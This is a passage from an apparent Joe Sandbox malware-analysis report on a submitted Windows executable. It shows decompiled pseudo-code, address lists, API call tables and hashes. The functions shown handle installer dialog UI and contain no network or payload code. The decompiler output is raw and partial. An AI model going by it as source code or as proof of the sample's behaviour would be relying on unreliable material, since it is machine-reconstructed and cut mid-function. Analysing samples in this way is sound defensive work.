						if( *0x42374c == _t149) {
							ShowWindow( *0x423f88, 8);
							if( *0x42400c == _t149) {
								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
							}
							E00403F90(1);
							goto L25;
						}
						 *0x41f948 = 2;
						E00403F90(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040401E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423750, _t149);
						ShowWindow(_t154, 8);
						E00403FEC(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423750 = GetDlgItem(_a4, 0x403);
				 *0x423748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423764 = _t127;
				_v8 = _t127;
				E00403FEC( *0x423750);
				 *0x423754 = E00404889(4);
				 *0x42376c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FB7(_a4);
				if(( *0x423f98 & 0x00000003) != 0) {
					ShowWindow( *0x423750, _t149);
					if(( *0x423f98 & 0x00000002) != 0) {
						 *0x423750 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403FEC( *0x423748);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                              0x0040512e
                                              0x00405134
                                              0x0040513d
                                              0x00405140
                                              0x004052d8
                                              0x004052fc
                                              0x004052fc
                                              0x0040530f
                                              0x0040532d
                                              0x00405334
                                              0x0040538b
                                              0x0040538f
                                              0x00000000
                                              0x00405396
                                              0x0040539e
                                              0x004053a6
                                              0x004053a9
                                              0x004054a2
                                              0x00000000
                                              0x004054a2
                                              0x004053b8
                                              0x004053c4
                                              0x004053ca
                                              0x004053d0
                                              0x004053e5
                                              0x004053eb
                                              0x004053d2
                                              0x004053d7
                                              0x004053dd
                                              0x004053e0
                                              0x004053e0
                                              0x004053fb
                                              0x00405403
                                              0x00405406
                                              0x0040540f
                                              0x00405412
                                              0x00405419
                                              0x00405420
                                              0x00405428
                                              0x00405428
                                              0x0040543f
                                              0x0040543f
                                              0x00405446
                                              0x0040544c
                                              0x00405455
                                              0x0040545c
                                              0x00405465
                                              0x00405467
                                              0x0040546a
                                              0x00405479
                                              0x0040547b
                                              0x00405481
                                              0x00405482
                                              0x00405483
                                              0x0040548b
                                              0x00405496
                                              0x0040549c
                                              0x0040549c
                                              0x00000000
                                              0x00405406
                                              0x0040538f
                                              0x0040533c
                                              0x0040536c
                                              0x00405374
                                              0x0040537f
                                              0x0040537f
                                              0x00405386
                                              0x00000000
                                              0x00405386
                                              0x00405340
                                              0x0040534a
                                              0x00000000
                                              0x00405311
                                              0x00405317
                                              0x0040534f
                                              0x00000000
                                              0x00405358
                                              0x00405320
                                              0x00405325
                                              0x00405328
                                              0x00000000
                                              0x00405328
                                              0x0040530f
                                              0x00405146
                                              0x0040514a
                                              0x00405153
                                              0x0040515a
                                              0x0040515d
                                              0x00405160
                                              0x00405163
                                              0x00405164
                                              0x00405165
                                              0x0040517e
                                              0x00405181
                                              0x0040518b
                                              0x0040519a
                                              0x004051a2
                                              0x004051aa
                                              0x004051af
                                              0x004051b2
                                              0x004051be
                                              0x004051c7
                                              0x004051d0
                                              0x004051f3
                                              0x004051f9
                                              0x0040520a
                                              0x0040520f
                                              0x0040521d
                                              0x0040522b
                                              0x0040522b
                                              0x00405230
                                              0x0040523e
                                              0x0040523e
                                              0x00405243
                                              0x00405246
                                              0x0040524b
                                              0x00405257
                                              0x00405260
                                              0x0040526d
                                              0x0040527c
                                              0x0040526f
                                              0x00405274
                                              0x00405274
                                              0x00405288
                                              0x00405288
                                              0x0040529c
                                              0x004052a5
                                              0x004052ae
                                              0x004052be
                                              0x004052ca
                                              0x004052ca
                                              0x00000000

                                              APIs
                                              • GetDlgItem.USER32 ref: 00405184
                                              • GetDlgItem.USER32 ref: 00405193
                                              • GetClientRect.USER32 ref: 004051D0
                                              • GetSystemMetrics.USER32 ref: 004051D8
                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                                              • ShowWindow.USER32(?,00000008), ref: 00405274
                                              • GetDlgItem.USER32 ref: 00405295
                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
                                              • GetDlgItem.USER32 ref: 004051A2
                                                • Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA
                                              • GetDlgItem.USER32 ref: 004052E7
                                              • CreateThread.KERNEL32 ref: 004052F5
                                              • CloseHandle.KERNEL32(00000000), ref: 004052FC
                                              • ShowWindow.USER32(00000000), ref: 00405320
                                              • ShowWindow.USER32(?,00000008), ref: 00405325
                                              • ShowWindow.USER32(00000008), ref: 0040536C
                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040539E
                                              • CreatePopupMenu.USER32 ref: 004053AF
                                              • AppendMenuA.USER32 ref: 004053C4
                                              • GetWindowRect.USER32 ref: 004053D7
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
                                              • OpenClipboard.USER32(00000000), ref: 00405446
                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                                              • GlobalLock.KERNEL32 ref: 0040545F
                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                                              • SetClipboardData.USER32 ref: 00405496
                                              • CloseClipboard.USER32 ref: 0040549C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                              • Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
                                              • Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                              • Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42055c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420574;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42055c = _t315;
								 *0x420574 = _t315;
								 *0x423fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420574;
									_t196 =  *0x423fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
											E00404871(0x3ff, 0xfffffffb, E00404889(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420574);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                              0x00404954
                                              0x0040495a
                                              0x0040495c
                                              0x00404962
                                              0x00404968
                                              0x00404975
                                              0x0040497e
                                              0x00404981
                                              0x00404984
                                              0x00404bac
                                              0x00404bb3
                                              0x00404bc7
                                              0x00404bb5
                                              0x00404bb7
                                              0x00404bba
                                              0x00404bbb
                                              0x00404bc2
                                              0x00404bc2
                                              0x00404bd3
                                              0x00404be1
                                              0x00404be4
                                              0x00404bfa
                                              0x00404c72
                                              0x00404c75
                                              0x00404c77
                                              0x00404c81
                                              0x00404c8f
                                              0x00404c8f
                                              0x00404c91
                                              0x00404c9b
                                              0x00404ca1
                                              0x00404cc2
                                              0x00404ca3
                                              0x00404cb0
                                              0x00404cb0
                                              0x00404ca1
                                              0x00404c9b
                                              0x00000000
                                              0x00404c75
                                              0x00404bff
                                              0x00404c0a
                                              0x00404c0f
                                              0x00404c16
                                              0x00404c1d
                                              0x00404c27
                                              0x00404c27
                                              0x00404c2b
                                              0x00404c30
                                              0x00404c35
                                              0x00404c4b
                                              0x00404c37
                                              0x00404c37
                                              0x00404c3f
                                              0x00404c46
                                              0x00404c41
                                              0x00404c41
                                              0x00404c41
                                              0x00404c3f
                                              0x00404c4f
                                              0x00404c51
                                              0x00404c5f
                                              0x00404c60
                                              0x00404c6c
                                              0x00404c6f
                                              0x00404c6f
                                              0x00404c30
                                              0x00000000
                                              0x00404c1d
                                              0x00404c01
                                              0x00404c08
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00404cc5
                                              0x00404cc5
                                              0x00404ccc
                                              0x00404d40
                                              0x00404d47
                                              0x00404d53
                                              0x00404d53
                                              0x00404d5c
                                              0x00404d5e
                                              0x00404d65
                                              0x00404d68
                                              0x00404d68
                                              0x00404d6e
                                              0x00404d75
                                              0x00404d78
                                              0x00404d78
                                              0x00404d7e
                                              0x00404d84
                                              0x00404d8a
                                              0x00404d8a
                                              0x00404d97
                                              0x00404ee4
                                              0x00404eeb
                                              0x00404f08
                                              0x00404f0e
                                              0x00404f20
                                              0x00404f20
                                              0x00000000
                                              0x00404d9d
                                              0x00404d9f
                                              0x00404da7
                                              0x00404dab
                                              0x00404dab
                                              0x00404db3
                                              0x00404df4
                                              0x00404df6
                                              0x00404e06
                                              0x00404e09
                                              0x00404e0e
                                              0x00404e15
                                              0x00404e18
                                              0x00404eba
                                              0x00404ec0
                                              0x00404ece
                                              0x00404edf
                                              0x00404edf
                                              0x00000000
                                              0x00404ece
                                              0x00404e1e
                                              0x00404e21
                                              0x00404e27
                                              0x00404e2c
                                              0x00404e2e
                                              0x00404e30
                                              0x00404e36
                                              0x00404e3d
                                              0x00404e42
                                              0x00404e49
                                              0x00404e4c
                                              0x00404e4c
                                              0x00404e53
                                              0x00404e5f
                                              0x00404e63
                                              0x00404e65
                                              0x00404e65
                                              0x00404e55
                                              0x00404e57
                                              0x00404e57
                                              0x00404e85
                                              0x00404e91
                                              0x00404ea0
                                              0x00404ea0
                                              0x00404ea2
                                              0x00404ea5
                                              0x00404eae
                                              0x00000000
                                              0x00404db5
                                              0x00404dc0
                                              0x00404dc3
                                              0x00404dc8
                                              0x00404dca
                                              0x00404dce
                                              0x00404dde
                                              0x00404de8
                                              0x00404dea
                                              0x00404ded
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00404dd0
                                              0x00404dd0
                                              0x00404dd6
                                              0x00404dd8
                                              0x00404dd8
                                              0x00404dd9
                                              0x00404dda
                                              0x00000000
                                              0x00404dd0
                                              0x00404db3
                                              0x00404d97
                                              0x00404cd4
                                              0x00000000
                                              0x00404cea
                                              0x00404cf4
                                              0x00404cf9
                                              0x00000000
                                              0x00000000
                                              0x00404d0b
                                              0x00404d10
                                              0x00404d1c
                                              0x00404d1c
                                              0x00404d1e
                                              0x00404d2d
                                              0x00404d2f
                                              0x00404d36
                                              0x00404d39
                                              0x00000000
                                              0x00404d39
                                              0x00404cd4
                                              0x0040498a
                                              0x0040498f
                                              0x00404999
                                              0x0040499a
                                              0x004049a3
                                              0x004049ae
                                              0x004049b9
                                              0x004049bf
                                              0x004049cd
                                              0x004049e2
                                              0x004049e7
                                              0x004049f2
                                              0x004049fb
                                              0x00404a10
                                              0x00404a21
                                              0x00404a2e
                                              0x00404a2e
                                              0x00404a33
                                              0x00404a39
                                              0x00404a3b
                                              0x00404a3e
                                              0x00404a43
                                              0x00404a48
                                              0x00404a4a
                                              0x00404a4a
                                              0x00404a6a
                                              0x00404a6a
                                              0x00404a6c
                                              0x00404a6d
                                              0x00404a72
                                              0x00404a75
                                              0x00404a78
                                              0x00404a7c
                                              0x00404a81
                                              0x00404a86
                                              0x00404a8a
                                              0x00404a8f
                                              0x00404a94
                                              0x00404a96
                                              0x00404a9e
                                              0x00404b68
                                              0x00404b7b
                                              0x00000000
                                              0x00404aa4
                                              0x00404aa7
                                              0x00404aaa
                                              0x00404aad
                                              0x00404aad
                                              0x00404ab3
                                              0x00404ab9
                                              0x00404abc
                                              0x00404ac2
                                              0x00404ac3
                                              0x00404ac8
                                              0x00404ad1
                                              0x00404ad8
                                              0x00404adb
                                              0x00404ade
                                              0x00404ae1
                                              0x00404b1d
                                              0x00404b46
                                              0x00404b1f
                                              0x00404b2c
                                              0x00404b2c
                                              0x00404ae3
                                              0x00404ae6
                                              0x00404af5
                                              0x00404aff
                                              0x00404b07
                                              0x00404b0e
                                              0x00404b16
                                              0x00404b16
                                              0x00404ae1
                                              0x00404b4c
                                              0x00404b4d
                                              0x00404b59
                                              0x00404b59
                                              0x00404b66
                                              0x00404b81
                                              0x00404b85
                                              0x00404ba2
                                              0x00404ba7
                                              0x00404baa
                                              0x00000000
                                              0x00404b87
                                              0x00404b8c
                                              0x00404b95
                                              0x00404f22
                                              0x00404f34
                                              0x00404f34
                                              0x00404b85
                                              0x00000000
                                              0x00404b66
                                              0x00404a9e

                                              APIs
                                              • GetDlgItem.USER32 ref: 0040494D
                                              • GetDlgItem.USER32 ref: 0040495A
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
                                              • LoadBitmapA.USER32 ref: 004049B9
                                              • SetWindowLongA.USER32 ref: 004049D3
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
                                              • DeleteObject.GDI32(?), ref: 00404A33
                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
                                              • GetWindowLongA.USER32 ref: 00404B6D
                                              • SetWindowLongA.USER32 ref: 00404B7B
                                              • ShowWindow.USER32(?,00000005), ref: 00404B8C
                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D68
                                              • GlobalFree.KERNEL32 ref: 00404D78
                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
                                              • ShowWindow.USER32(?,00000000), ref: 00404F0E
                                              • GetDlgItem.USER32 ref: 00404F19
                                              • ShowWindow.USER32(00000000), ref: 00404F20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                              • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                                              • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                              • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

